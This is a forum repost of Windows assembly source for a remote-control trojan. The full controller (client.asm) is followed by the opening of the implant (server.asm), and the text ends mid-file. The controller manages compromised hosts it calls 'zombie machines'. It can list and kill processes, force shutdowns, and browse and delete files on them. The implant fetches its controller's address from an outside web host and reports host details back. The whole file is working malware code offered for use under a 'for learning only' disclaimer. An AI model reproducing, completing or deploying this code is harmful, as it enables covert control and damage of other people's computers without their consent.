这个程序写到一半就不想写了，所以代码写得比较粗糙，但已经可以让多台主机同时上线，其余功能你们可以自行修改。发上来给需要的人，说不定对谁有用。（阅读提示：本页转载时反斜杠似乎都被显示成了 `/`，例如 `C:/`、`w2k/ntdll.inc`、`SOFTWARE/Microsoft/Windows` 以及 invoke 参数末尾的行续接符，对照原文时请注意还原。）
注意：代码仅供学习之用；若有人将此代码修改成恶意程序，与作者无关。
client.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include wsock32.inc
includelib wsock32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include comdlg32.inc
includelib comdlg32.lib
include ole32.inc
includelib ole32.lib
include shell32.inc
includelib shell32.lib
include odbc32.inc
includelib odbc32.lib
include macros.inc
include data.INC
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;客户端会话
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SESSION struct                     ; per-connection record; declared here but not referenced anywhere in this file
dwip dd ?                          ; host address as a 32-bit value
hsocket db 12 dup (?)              ; socket handle as text (the list box shows "%x" of the handle)
szHostIP db 156 dup(?)             ; host IP string
szHostName db 156 dup(?)           ; host name
szHostTime db 156 dup(?)           ; check-in time string
szWhat db 156 dup(?)               ; operator remark
SESSION ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;自定义协议结构,显示肉鸡上线信息
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Check-in record. Mirrors the MSG_SYSINFO layout in server.asm, which
; sends it as a string followed by the "[info]" tag; this file only
; copies the incoming text to buff2 and never reads the fields.
MSG_SYSINFO struct
dwip dd ?                          ; host address (never written by the visible server code)
szHostIP db 156 dup(?)             ; host IP string
szHostName db 156 dup(?)           ; host name
szHostTime db 156 dup(?)           ; check-in time string
szWhat db 156 dup(?)               ; remark read from the registry on the host
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;显示下线日志
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
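; Insert one row of text into hlistview as item `row`, with lParam = row.
;   row    - item index
;   lpTime - pointer to the NUL-terminated text for the item
; hlistview is obtained from IDC_Log in _ProcDlgMain; that control also
; receives LB_ADDSTRING, so only one of the two message families can be
; meaningful for it -- check the dialog template.
ShowProcess proc row:DWORD,lpTime:DWORD
    LOCAL lvi:LV_ITEM
    ; Start from an all-zero item so the fields not covered by imask
    ; (state, stateMask, iImage, ...) are defined rather than stack garbage.
    invoke RtlZeroMemory,addr lvi,sizeof lvi
    mov lvi.imask,LVIF_TEXT+LVIF_PARAM
    mov eax,row
    mov lvi.iItem,eax
    mov lvi.iSubItem,0
    mov eax,lpTime                    ; lpTime is already a pointer, so mov (not lea)
    mov lvi.pszText,eax
    mov eax,row
    mov lvi.lParam,eax                ; row number travels with the item
    invoke SendMessage,hlistview, LVM_InsertITEM,0, addr lvi
    ret
ShowProcess endp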
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 字符串到16或10进制
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
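; Parse a NUL-terminated numeric string in base _dwBase (10 or 16).
;   _lpString - pointer to the digits ("0"-"9", "a"-"f"/"A"-"F")
;   _dwBase   - radix
; Returns the value in eax. No validation: any other character is folded
; into the result as if it were a digit.
; ebx/esi are callee-saved under stdcall, so they are preserved here
; (the original clobbered them and relied on the caller's pushad/popad).
_StrToVal proc uses ebx esi _lpString,_dwBase
    mov esi,_lpString
    cld
    xor eax,eax
    mov ebx,_dwBase
    .while TRUE
        movzx ecx,byte ptr [esi]
        inc esi
        .break .if ! ecx              ; terminator
        .if cl > '9'
            and cl,not 20h            ; fold to upper case
            sub cl,'A' - 0ah          ; 'A'..'F' -> 10..15
        .else
            sub cl,'0'
        .endif
        mul ebx                       ; eax = eax * base (edx clobbered)
        add eax,ecx
    .endw
    ret
_StrToVal endp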
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;此函数的用途是选择每一个连接上的肉鸡socket的编号
;并发送命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
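; Send a command string to the host currently selected in IDC_ServerList.
;   _CmdLine - pointer to the NUL-terminated command text
; The list entries are written by _AddClient as "%x" of the socket handle,
; so the text is parsed back as base 16 to recover the handle.
; With nothing selected the original passed LB_ERR to LB_GETTEXT, left
; @buff1 untouched and sent to whatever stale handle that parsed to; now
; the command is simply not sent. The send result is not checked.
GetSocketAndSend proc _CmdLine:DWORD
    pushad
    invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETCURSEL,0,0
    .if eax != LB_ERR
        lea ecx,@buff1
        invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETTEXT,eax,ecx
        invoke _StrToVal,addr @buff1,00000010h
        mov edi,eax                   ; edi = socket handle
        invoke lstrlen,_CmdLine
        ; No framing, no terminator, no authentication: the raw text goes out.
        invoke send,edi,_CmdLine,eax,0
    .endif
    popad
    ret
GetSocketAndSend endp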
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Show the standard "Open" dialog and store the chosen path in the
; caller's buffer.
;   _FileBuff - pointer to a buffer of at least MAX_PATH bytes
; Returns GetOpenFileName's result in eax (non-zero if a file was chosen).
_OpenFile proc _FileBuff:DWORD
    local @stOF:OPENFILENAME
    invoke RtlZeroMemory,addr @stOF,sizeof @stOF
    mov @stOF.lStructSize,sizeof @stOF
    mov eax,hWinMain
    mov @stOF.hwndOwner,eax
    mov @stOF.lpstrFilter,offset szFilter
    mov ecx,_FileBuff
    mov @stOF.lpstrFile,ecx
    mov @stOF.nMaxFile,MAX_PATH
    mov @stOF.Flags,OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST
    mov @stOF.lpstrDefExt,CTXT("文件")
    invoke GetOpenFileName,addr @stOF
    ret
_OpenFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 显示肉鸡上线数量
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Thread entry (see _ProcDlgMain / FD_ACCEPT): register a freshly accepted
; connection in stTable, show it in the socket list box and bump the
; on-line counter. When every slot is taken the connection is dropped.
;   _hSocket - the accepted socket
; stTable/dwCount are globals touched from several threads without locking.
_AddClient proc _hSocket
    ; Ask for read/close notifications on the new connection.
    invoke WSAAsyncSelect,_hSocket,hWinMain,WM_SOCKET,FD_READ or FD_CLOSE
    mov esi,offset stTable            ; esi -> current slot
    mov ebx,MAX_SOCKET                ; ebx = slots left to inspect
    .while ebx != 0
        .if dword ptr [esi] == 0      ; free slot
            mov eax,_hSocket
            mov dword ptr [esi],eax
            inc dwCount
            ; The list box entry is the handle in hex; GetSocketAndSend
            ; parses it back.
            invoke wsprintf,addr @buff,CTXT("%x"),_hSocket
            invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr @buff
            invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE
            ret
        .endif
        add esi,4
        dec ebx
    .endw
    invoke closesocket,_hSocket
    ret
_AddClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;肉鸡下线就去掉一个socket,并删除ListBox里的socket编号
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
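; Thread entry (see _ProcDlgMain / FD_CLOSE): a host went off-line. Close
; its socket, free its stTable slot, log the time and remove its entry from
; IDC_ServerList.
;   _hSocket - the socket that reported FD_CLOSE
; Fixes: the list box entry is now located by its text ("%x" of the handle,
; as written by _AddClient) instead of deleting whatever entry happened to be
; selected; ShowProcess is given a defined row (0) instead of a clobbered ecx.
; The log text still labels minutes with "秒" -- left as is.
_RemoveClient proc _hSocket
    local szTime:SYSTEMTIME
    local szBuff[1024]:DWORD
    local szSockText[32]:byte
    xor ebx,ebx                       ; ebx = slot index
    mov esi,offset stTable
    mov edi,_hSocket
    .while ebx < MAX_SOCKET
        .if dword ptr [esi] == edi
            invoke closesocket,edi
            mov dword ptr [esi],0
            dec dwCount
            invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE
            invoke GetSystemTime,addr szTime
            movzx eax,szTime.wMonth
            movzx ecx,szTime.wDay
            movzx edx,szTime.wHour
            movzx ebx,szTime.wMinute
            invoke wsprintf,addr szBuff,CTXT("有主机下线请注意,下线时间为:%d月%d日%d时%d秒"),eax,ecx,edx,ebx
            invoke ShowProcess,0,addr szBuff
            invoke SendDlgItemMessage,hWinMain,IDC_Log,LB_ADDSTRING,0,addr szBuff
            ; Remove the entry that names THIS socket.
            invoke wsprintf,addr szSockText,CTXT("%x"),edi
            invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_FINDSTRINGEXACT,-1,addr szSockText
            .if eax != LB_ERR
                invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_DeleteSTRING,eax,0
            .endif
            ret
        .endif
        inc ebx
        add esi,4
    .endw
    ret
_RemoveClient endp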
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 处理接收到的TCP包
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
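; Thread entry (see _ProcDlgMain / FD_READ): read whatever is available on
; _hSocket into the shared szReadBuffer and classify it by substring:
;   contains ":/"        -> a path, appended to the file dialog's list
;   else contains ".exe" -> a process name, appended to the process dialog
;   contains "[info]"    -> check-in record, copied (minus the tag) to buff2
; The text is untrusted: any peer that reaches the listening port can send
; it. szReadBuffer is one global shared by every FD_READ thread, so two
; overlapping reads can interleave -- TODO confirm this is tolerable.
; Fixes: recv is limited to sizeof-1 so a full read is still NUL-terminated
; for the StrStr calls; a closed/failed read is no longer parsed.
_RecvDataServer proc _hSocket
    invoke RtlZeroMemory,addr szReadBuffer,sizeof szReadBuffer
    invoke recv,_hSocket,addr szReadBuffer,sizeof szReadBuffer - 1,NULL
    .if (eax == 0) || (eax == SOCKET_ERROR)
        ret                           ; nothing to parse; FD_CLOSE handles teardown
    .endif
    invoke StrStr,addr szReadBuffer,CTXT(":/")
    .if eax != NULL
        ; Path entry.
        inc lpAllFile
        invoke SendDlgItemMessage,hWinMain2,IDC_FileList,LB_ADDSTRING,0,addr szReadBuffer
        invoke SetDlgItemText,hWinMain2,IDC_GetSomeThing,addr szReadBuffer
        invoke wsprintf,addr szFileShuMu,CTXT("%d 个文件或目录"),lpAllFile
        invoke SetDlgItemText,hWinMain2,IDC_AllFile,addr szFileShuMu
    .else
        ; No ":/" -- a ".exe" means a process name.
        invoke StrStr,addr szReadBuffer,CTXT(".exe")
        .if eax != NULL
            inc lpShuMu
            invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_ADDSTRING,0,addr szReadBuffer
            invoke wsprintf,addr szProcessShuMu,CTXT("%d 个进程"),lpShuMu
            invoke SetDlgItemText,hWinMain1,IDC_ProcessShuMu,addr szProcessShuMu
        .endif
    .endif
    ; Check-in record: drop the 6-byte "[info]" tag. The copy takes
    ; (strlen - 6) bytes from the start, i.e. it assumes the tag is at the
    ; end. buff2 is not read anywhere in this file.
    invoke StrStr,addr szReadBuffer,CTXT("[info]")
    .if eax != NULL
        pushad
        invoke lstrlen,addr szReadBuffer
        sub eax,6
        lea esi,szReadBuffer
        lea edi,buff2
        mov ecx,eax
        rep movsb
        mov byte ptr [edi],0
        popad
    .endif
    ret
_RecvDataServer endp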
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 初始化 Socket,绑定到服务TCP端口并监听
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
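; Create the listening socket on 0.0.0.0:9999 and register it for
; FD_ACCEPT notifications (WM_SOCKET) on the main dialog.
; Anything that can reach the port may register as a host and push text
; into the UI -- there is no authentication.
; Fixes: a second click no longer overwrites the live listener handle (the
; original created a new socket, lost the old one on bind failure and
; closed only the new one at WM_CLOSE); socket() failure is checked; on
; bind/listen failure the socket is closed and Socket reset to 0.
; Assumes Socket starts at 0 (declared in data.INC -- TODO confirm).
_Init proc
    local @stWsa:WSADATA
    local @stSin:sockaddr_in
    .if Socket != 0
        invoke MessageBox,hWinMain,CTXT("本程序已经监听,无法进行第二次操作"),NULL,MB_OK or MB_ICONWARNING
        ret
    .endif
    invoke WSAStartup,101h,addr @stWsa
    invoke socket,AF_INET,SOCK_STREAM,0
    .if eax == INVALID_SOCKET
        ret
    .endif
    mov Socket,eax
    invoke WSAAsyncSelect,Socket,hWinMain,WM_SOCKET,FD_ACCEPT
    invoke RtlZeroMemory,addr @stSin,sizeof @stSin
    invoke htons,9999
    mov @stSin.sin_port,ax
    mov @stSin.sin_family,AF_INET
    mov @stSin.sin_addr,INADDR_ANY
    invoke bind,Socket,addr @stSin,sizeof @stSin
    .if eax == SOCKET_ERROR
        ; Port in use (or other bind failure): release the socket.
        invoke closesocket,Socket
        mov Socket,0
        invoke MessageBox,hWinMain,CTXT("本程序已经监听,无法进行第二次操作"),NULL,MB_OK or MB_ICONWARNING
        ret
    .endif
    invoke listen,Socket,5
    .if eax == SOCKET_ERROR
        invoke closesocket,Socket
        mov Socket,0
    .endif
    ret
_Init endp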
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
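; Dialog procedure for the remote process window (DLG_Process).
;   hWnd1/wMsg/wParam/lParam - standard DLGPROC arguments
; Returns TRUE when the message was handled, FALSE otherwise.
; Fix: the selected list entry is remote-supplied text and LB_GETTEXT does
; not bound its copy; the buffer was 128 bytes. It is now 1024 bytes and the
; length is checked with LB_GETTEXTLEN first, leaving room for the
; "[killprocess]" tag appended below.
_ProcDlgProcess proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
    local @szBuffer[1024]:byte
    local szKillProcess[1024]:byte
    local szOut[1024]:byte
    mov eax,wMsg
    .if eax == WM_CLOSE
        invoke EndDialog,hWnd1,NULL
    .elseif eax == WM_INITDIALOG
        push hWnd1
        pop hWinMain1                 ; _RecvDataServer posts process names here
        invoke LoadIcon,hInstance,ICO_MAIN
        invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
    .elseif eax == WM_COMMAND
        mov eax,wParam
        .if ax == IDC_GetProcessList
            mov lpShuMu,0
            invoke SendDlgItemMessage,hWnd1,IDC_ProcessList,LB_RESETCONTENT,0,0
            invoke GetSocketAndSend,CTXT("[getprocess]")
        .elseif ax == IDC_ProcessList
            shr eax,16                ; notification code
            .if ax == LBN_SELCHANGE
                ; Selecting an entry offers to terminate that process remotely.
                invoke SendMessage,lParam,LB_GETCURSEL,0,0
                .if eax != LB_ERR
                    mov ebx,eax
                    invoke SendMessage,lParam,LB_GETTEXTLEN,ebx,0
                    .if eax < (sizeof @szBuffer - 16)
                        lea ecx,@szBuffer
                        invoke SendMessage,lParam,LB_GETTEXT,ebx,ecx
                        invoke wsprintf,addr szOut,CTXT("你确定要结束对方 %s 这个进程吗?"),addr @szBuffer
                        invoke MessageBox,hWnd1,addr szOut,CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
                        .if eax != IDNO
                            invoke RtlZeroMemory,addr szKillProcess,sizeof szKillProcess
                            invoke lstrcat,addr szKillProcess,addr @szBuffer
                            invoke lstrcat,addr szKillProcess,CTXT("[killprocess]")
                            invoke GetSocketAndSend,addr szKillProcess
                        .endif
                    .endif
                .endif
            .endif
        .elseif ax == IDC_RefeProcessList
            mov lpShuMu,0
            invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_RESETCONTENT,0,0
            invoke GetSocketAndSend,CTXT("[getprocess]")
        .elseif ax == IDC_ExitWindows
            invoke MessageBox,hWnd1,CTXT("这条命令会无条件关闭对方电脑,是否要执行?"),CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
            .if eax != IDNO
                invoke GetSocketAndSend,CTXT("[exitwindows]")
            .endif
        .endif
    .else
        mov eax,FALSE
        ret
    .endif
    mov eax,TRUE
    ret
_ProcDlgProcess endp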
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
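; Dialog procedure for the remote file window (DLG_File).
;   hWnd1/wMsg/wParam/lParam - standard DLGPROC arguments
; Returns TRUE when the message was handled, FALSE otherwise.
; Fixes: the delete confirmation box had no Yes/No buttons, so "!= IDNO"
; could never refuse; the length of a selected entry (remote text) is
; checked before LB_GETTEXT copies it; szDelFile is cleared before the
; command is built (it is a global, so every deletion appended to the last
; one); a leftover debug popup of the raw command and a dead copy loop
; that read past szFileToDel were removed.
_ProcDlgFile proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
    local @szBuffer1[1024]:byte
    local @szBuffer2[1024]:byte
    mov eax,wMsg
    .if eax == WM_CLOSE
        invoke EndDialog,hWnd1,NULL
    .elseif eax == WM_INITDIALOG
        push hWnd1
        pop hWinMain2                 ; _RecvDataServer posts paths here
        invoke LoadIcon,hInstance,ICO_MAIN
        invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
        mov lpAllFile,0
        ; Ask the selected host for its drive list as soon as the dialog opens.
        invoke GetSocketAndSend,CTXT("[getfile]")
    .elseif eax == WM_COMMAND
        mov eax,wParam
        .if ax == IDC_LookFile1
            invoke _OpenFile,addr szBenDiFile
            invoke SetDlgItemText,hWnd1,IDC_BenDiFile,addr szBenDiFile
        .elseif ax == IDC_FileList
            mov lpAllFile,0
            shr eax,16                ; notification code
            .if ax == LBN_SELCHANGE
                ; Selecting an entry lists it as a directory on the host.
                invoke SendMessage,lParam,LB_GETCURSEL,0,0
                .if eax != LB_ERR
                    mov ebx,eax
                    ; Leave room for the 13-byte "[getfilepaht]" tag.
                    invoke SendMessage,lParam,LB_GETTEXTLEN,ebx,0
                    .if eax < (sizeof @szBuffer1 - 16)
                        lea ecx,@szBuffer1
                        invoke SendMessage,lParam,LB_GETTEXT,ebx,ecx
                        invoke RtlZeroMemory,addr @szBuffer2,sizeof @szBuffer2
                        invoke lstrcat,addr @szBuffer2,addr @szBuffer1
                        invoke lstrcat,addr @szBuffer2,CTXT("[getfilepaht]")
                        invoke GetSocketAndSend,addr @szBuffer2
                        invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
                        invoke SetDlgItemText,hWnd1,IDC_YuanChengFile,addr @szBuffer1
                        invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnYuanCheng,addr @szBuffer1
                        invoke SetDlgItemText,hWnd1,IDC_FileToDel,addr @szBuffer1
                    .endif
                .endif
            .endif
        .elseif ax == IDC_LookFile2
            invoke _OpenFile,addr szBenDiFile1
            invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnBenDi,addr szBenDiFile1
        .elseif (ax == IDC_CHECK2)||(ax == IDC_LoadDownFile)
            ; upload/download: not implemented
        .elseif ax == IDC_DelFile
            invoke MessageBox,hWnd1,CTXT("真的要删除远程主机上的文件吗?"),CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
            .if eax != IDNO
                invoke GetDlgItemText,hWnd1,IDC_FileToDel,addr szFileToDel,sizeof szFileToDel
                ; A "." anywhere in the path is taken to mean "this is a file".
                invoke StrStr,addr szFileToDel,CTXT(".")
                .if eax == NULL
                    invoke MessageBox,NULL,CTXT("你选择的不是文件,无法删除"),CTXT("友情提示"),MB_ICONSTOP
                .else
                    invoke RtlZeroMemory,addr szDelFile,sizeof szDelFile
                    invoke lstrcat,addr szDelFile,addr szFileToDel
                    invoke lstrcat,addr szDelFile,CTXT("[delfile]")
                    invoke GetSocketAndSend,addr szDelFile
                .endif
            .endif
        .elseif ax == IDC_RefeFileList
            mov lpAllFile,0
            invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
            invoke GetSocketAndSend,CTXT("[getfile]")
        .endif
    .else
        mov eax,FALSE
        ret
    .endif
    mov eax,TRUE
    ret
_ProcDlgFile endp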
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
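; Main controller dialog procedure (DLG_MAIN).
;   hWnd/wMsg/wParam/lParam - standard DLGPROC arguments
; Returns TRUE when the message was handled, FALSE otherwise.
; WM_SOCKET is the WSAAsyncSelect notification: wParam = socket, low word
; of lParam = event. Every event is handed to a throw-away thread, so reads
; on different sockets may overlap on the shared szReadBuffer.
; Fixes: accept() failure is checked; thread handles are closed (one was
; leaked per event).
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
    mov eax,wMsg
    .if eax == WM_SOCKET
        mov eax,lParam
        .if ax == FD_ACCEPT
            invoke accept,wParam,0,0
            .if eax != INVALID_SOCKET
                mov hSocket1,eax
                invoke CreateThread,NULL,0,addr _AddClient,hSocket1,0,addr ThreadId
                .if eax != NULL
                    invoke CloseHandle,eax
                .endif
            .endif
        .elseif ax == FD_READ
            invoke CreateThread,NULL,0,addr _RecvDataServer,wParam,0,addr ThreadId1
            .if eax != NULL
                invoke CloseHandle,eax
            .endif
        .elseif ax == FD_CLOSE
            invoke CreateThread,NULL,0,addr _RemoveClient,wParam,0,addr ThreadId2
            .if eax != NULL
                invoke CloseHandle,eax
            .endif
        .endif
    .elseif eax == WM_CLOSE
        invoke closesocket,Socket     ; only the listener; accepted sockets in stTable are not closed here
        invoke WSACleanup
        invoke EndDialog,hWnd,NULL
    .elseif eax == WM_INITDIALOG
        push hWnd
        pop hWinMain
        invoke LoadIcon,hInstance,ICO_MAIN
        invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
        invoke GetDlgItem,hWnd,IDC_Log
        mov hlistview,eax             ; used by ShowProcess; IDC_Log also gets LB_ADDSTRING
    .elseif eax == WM_COMMAND
        mov eax,wParam
        .if ax == IDC_LoadServer
            invoke MessageBox,NULL,CTXT("配制服务端,暂时不写进去"),0,0
        .elseif ax == IDC_Port
            call _Init                ; start listening on 9999
        .elseif ax == IDC_Process
            invoke DialogBoxParam,hInstance,DLG_Process,NULL,offset _ProcDlgProcess,NULL
        .elseif ax == IDC_File
            invoke DialogBoxParam,hInstance,DLG_File,NULL,offset _ProcDlgFile,NULL
        .endif
    .else
        mov eax,FALSE
        ret
    .endif
    mov eax,TRUE
    ret
_ProcDlgMain endp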
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
; Entry point: run the main dialog modally; _ProcDlgMain does all the work.
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
server.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
include wininet.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
includelib wininet.lib
includelib advapi32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include w2k/ntdll.inc
includelib ntdll.lib
include macros.inc
; Check-in record. SendSysInfo fills the string fields and then appends the
; whole struct to szSysinfoData with lstrcat, i.e. as a C string starting at
; dwip. dwip is never written in this file and the instance lives in .data?,
; so its first byte is 0 and the copy stops immediately -- as far as the
; visible code shows, only the "[info]" tag actually reaches the controller.
MSG_SYSINFO struct
dwip dd ?                          ; host address; never assigned here
szHostIP db 156 dup(?)             ; dotted IP of the first address of gethostbyname()
szHostName db 156 dup(?)           ; gethostname() result
szHostTime db 156 dup(?)           ; check-in time (UTC, GetSystemTime)
szWhat db 156 dup(?)               ; remark read from HKLM\...\zhushi
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;ntddk.inc cannot be included here (it conflicts with windows.inc), so SE_SHUTDOWN_PRIVILEGE is defined by hand
SE_SHUTDOWN_PRIVILEGE equ 19       ; LUID of SeShutdownPrivilege
SendSysInfo proto :LPSTR
.data
lpBuffer db 10024 dup(0)           ; command receive buffer; _Main only ever recv()s 1024 bytes into it
buff db "%s",13,10,0               ; unused in this file
szUrl db ' http://www.asm32.cn/ip.txt',0 ; where the controller IP is fetched from: plain HTTP, no integrity check, so whoever controls that host/path controls every instance. Note the leading space -- TODO confirm WinINet tolerates it
szVol db 'C',0                     ; drive-letter loop variable for _GetFileDsik (global, so not reentrant)
szRegKey db "SOFTWARE/Microsoft/Windows",0 ; key read by SendSysInfo; this listing shows '/' where the original almost certainly had '\'
szKey db "zhushi",0 ;value name under szRegKey holding the operator's remark
.data?
szIP db 1024 dup(?)                ; raw HTTP body from szUrl, used as the address text
buff1 db 1025 dup(?)               ; unused in this file
szSerice db 1024 dup(?)            ; unused in this file
server SOCKET ?                    ; connection to the controller (shared by all command threads)
client SOCKET ?                    ; unused in this file
hWinMain dd ?                      ; unused in this file
hSnapShot dd ?                     ; Toolhelp snapshot, shared by _KillProcess/_GetProcessList
closepid dd ?                      ; PID chosen by _KillProcess (never reset)
Pid dd ?                           ; unused in this file
dwFolderCount dd ?                 ; directories seen by _GetFilePath (write-only)
@stData WSADATA<?>
ThreadId DWORD ?                   ; ThreadId.. receive the thread ids from CreateThread; nothing reads them
ThreadId1 DWORD ?
ThreadId2 DWORD ?
ThreadId3 DWORD ?
ThreadId4 DWORD ?
ThreadId5 DWORD ?
ThreadId6 DWORD ?
ThreadId7 DWORD ?
stMsg MSG<?>                       ; for the keep-alive message loop in start
szHostName db 1024 dup(?)          ; gethostname() result
SendData db 1024 dup(?)            ; unused in this file
SendData1 db 1024 dup(?)           ; unused in this file
szHost db 1024 dup(?)              ; dotted IP text
buffer db 1024 dup(?)              ; unused in this file
buff2 db 1024 dup(?)               ; [killprocess] argument
buff3 db 1024 dup(?)               ; [getfilepaht] argument
buff4 db 1024 dup(?)               ; [delfile] argument
buff5 db 10024 dup(?)              ; Upfile argument (no handler)
buff6 db 10024 dup(?)              ; unused in this file
sysinfo MSG_SYSINFO<?>             ; check-in record (see MSG_SYSINFO)
szSysinfoData db 1024 dup(?)       ; wire form of the check-in: struct text + "[info]"
szKeyName db 100 dup(?)            ; registry value data
.const
MEMORYSIZE equ 50                  ; unused in this file
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Thread entry ([delfile] command): delete the file whose path _Main copied
